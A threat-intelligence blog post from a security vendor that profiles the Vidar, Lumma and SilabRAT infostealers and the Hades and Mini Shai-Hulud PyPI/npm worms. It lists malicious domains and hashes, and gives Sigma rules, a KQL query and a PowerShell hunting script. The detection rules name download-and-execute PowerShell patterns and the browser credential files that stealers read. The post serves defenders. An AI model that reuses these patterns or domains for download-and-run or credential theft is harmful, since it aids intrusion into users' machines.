The latest OTX pulses indicate a surge in credential theft activity utilizing diverse and sophisticated delivery vectors. Threat actors are capitalizing on current trends—specifically Artificial Intelligence hype and short-form video platforms—to distribute Infostealers like Vidar and Lumma. Concurrently, a supply chain campaign targeting Python (PyPI) and Node.js (npm) developers is deploying worms such as Hades and Mini Shai-Hulud.
The primary actors include Storm-3075, leveraging malvertising and SEO poisoning to distribute Vidar and Lumma Stealer, and o1oo1, the developer of SilabRAT, a Malware-as-a-Service (MaaS) offering featuring Hidden Virtual Network Computing (HVNC) for browser profile cloning. While distinct actors, the collective objective across these pulses is financial gain through the theft of cryptocurrency wallets, session cookies, and corporate credentials. The emergence of SilabRAT is particularly concerning due to its advanced session hijacking capabilities that bypass traditional MFA controls.
Threat Actor / Malware Profile
Vidar Stealer & Lumma Stealer (Storm-3075)
- Distribution: Malvertising campaigns impersonating AI brands (ChatGPT, Claude) and fake software tutorials on TikTok/Instagram Reels instructing users to run PowerShell commands.
- Payload Behavior: Info-stealer targeting browser data (passwords, cookies, history), cryptocurrency wallets, and 2FA session files.
- C2 Communication: Uses HTTP/HTTPS to exfiltrate stolen data to hardcoded C2 domains (e.g.,
brokeapt.com).
SilabRAT (o1oo1)
- Distribution: Sold on dark web forums for ~$5,000/month; delivered via loaders like HijackLoader.
- Payload Behavior: Remote Access Trojan (RAT) with HVNC capabilities, allowing attackers to control the victim's machine invisibly. Specializes in "browser profile cloning" to hijack active sessions without triggering 2FA re-prompting.
- Persistence: Uses registry run keys and scheduled tasks. Employs AsmCrypt for obfuscation.
Hades / Mini Shai-Hulud / Miasma (Supply Chain)
- Distribution: Malicious packages on PyPI and npm mimicking legitimate bioinformatics libraries (e.g.,
colorama,request). - Payload Behavior: Uses malicious
.pthstartup hooks and trojanized.abi3.sonative extensions to execute upon Python import. Capable of stealing credentials and spreading laterally.
IOC Analysis
The provided pulses yield a mix of network and file-based indicators:
- Domains & Hostnames:
msget.run,d4ug.site(TikTok Vidar C2),brokeapt.com(AI-themed malvertising),rongtv.xyzsubdomains. SOC teams should immediately block these at the DNS layer and inspect logs for historical resolutions. - File Hashes: Numerous SHA256 hashes associated with loaders (HijackLoader), main payloads (Vidar, SilabRAT), and malicious Python wheels. EDR solutions should be configured to quarantine any files matching these hashes.
- CVEs: Pulse 2 references
CVE-2026-20128andCVE-2026-20133regarding Cisco SD-WAN exploitation. While primarily an access vector, successful exploitation provides the foothold for credential dumping tools.
Detection Engineering
YAML
---
title: Potential Vidar Stealer Execution via PowerShell
description: Detects potential execution of Vidar Stealer via PowerShell commands downloading from suspicious domains observed in TikTok campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
- https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
service: security
detection:
selection:
EventID: 4688
NewProcessName|endswith:
- \powershell.exe
- \pwsh.exe
CommandLine|contains:
- 'Invoke-WebRequest'
- 'IEX'
- 'DownloadString'
CommandLine|contains:
- 'msget.run'
- 'd4ug.site'
condition: selection
falsepositives:
- Legitimate administrative scripts
level: high
---
title: Suspicious Python Import via Malicious PyPI Wheel
description: Detects execution patterns associated with the Hades/Mini Shai-Hulud PyPI supply chain attack, specifically loading malicious .so or .pth files.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
- https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
- attack.initial_access
- attack.t1195.002
logsource:
product: linux
definition: 'Assume standard sysmon or auditd logging for process execution'
detection:
selection_python:
Image|endswith: '/python'
CommandLine|contains:
- 'import'
- '-c'
selection_suspicious_lib:
CommandLine|contains:
- '.pth'
- '.abi3.so'
selection_paths:
# References specific paths often abused by sys.path modification in these attacks
CommandLine|contains:
- 'site-packages'
condition: all of selection_*
falsepositives:
- Legitimate developer environment builds
level: high
---
title: Credential Theft Accessing Browser Databases
description: Generic detection for infostealers like Vidar, Lumma, and SilabRAT accessing browser SQLite databases for credential theft.
status: experimental
author: Security Arsenal
date: 2026/06/14
references:
- https://www.microsoft.com/en-us/security/blog/2026/06/08/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering/
tags:
- attack.credential_access
- attack.t1005
logsource:
category: file_access
product: windows
detection:
selection:
TargetFilename|contains:
- '\AppData\Local\Google\Chrome\User Data\Default\Cookies'
- '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
- '\AppData\Roaming\Mozilla\Firefox\Profiles\'
- '\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cookies'
filter:
Image|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\brave.exe'
- '\msedge.exe'
condition: selection and not filter
falsepositives:
- Browser synchronization tools
- Backup software
level: high
kql
// Hunt for network connections to known C2 domains from OTX Pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
"msget.run",
"d4ug.site",
"brokeapt.com",
"rongtv.xyz",
"ssffaa19.xyz"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
powershell
# IOC Hunt Script for Vidar and SilabRAT Artifacts
# Requires Administrative Privileges
$IOC_Hashes = @(
"4f5c5b3ef45cfff7721754487a86aeff9a2e6e32", # Vidar SHA1
"0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531", # Vidar SHA256
"3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b" # SilabRAT SHA256
)
$SuspiciousDomains = @("msget.run", "d4ug.site", "brokeapt.com")
Write-Host "[+] Checking DNS Cache for Suspicious Domains..."
Get-DnsClientCache | Where-Object {$SuspiciousDomains -contains $_.Entry} | Select-Object Entry, Data
Write-Host "[+] Scanning for known malicious file hashes in C:\Users..."
Get-ChildItem -Path "C:\Users" -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0kb -and $_.Length -lt 10mb } |
ForEach-Object {
$hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
if ($IOC_Hashes -contains $hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
}
Write-Host "[+] Checking for suspicious scheduled tasks (Common Persistence for SilabRAT/Vidar)..."
Get-ScheduledTask | Where-Object {$_.Actions.Execute -match "powershell" -or $_.Actions.Execute -match "cmd"} |
Select-Object TaskName, TaskPath, Actions
# Response Priorities
* **Immediate:** Block all identified IOCs (domains `brokeapt.com`, `msget.run`, IP `91.199.163.124`) at the firewall and proxy level. Quarantine endpoints matching the provided file hashes.
* **24h:** Initiate credential resets and identity verification for users in targeted sectors (Education, Finance, Tech) who may have interacted with AI-themed phishing or TikTok links. Review browser session logs for suspicious login locations.
* **1 Week:** Harden the software supply chain by implementing strict dependency verification (SBOM checks) for Python and npm packages. Conduct security awareness training focused on "AI-powered" social engineering and the risks of executing code from social media tutorials.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsvidar-stealersilabratsupply-chaincredential-theftsocial-engineering
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.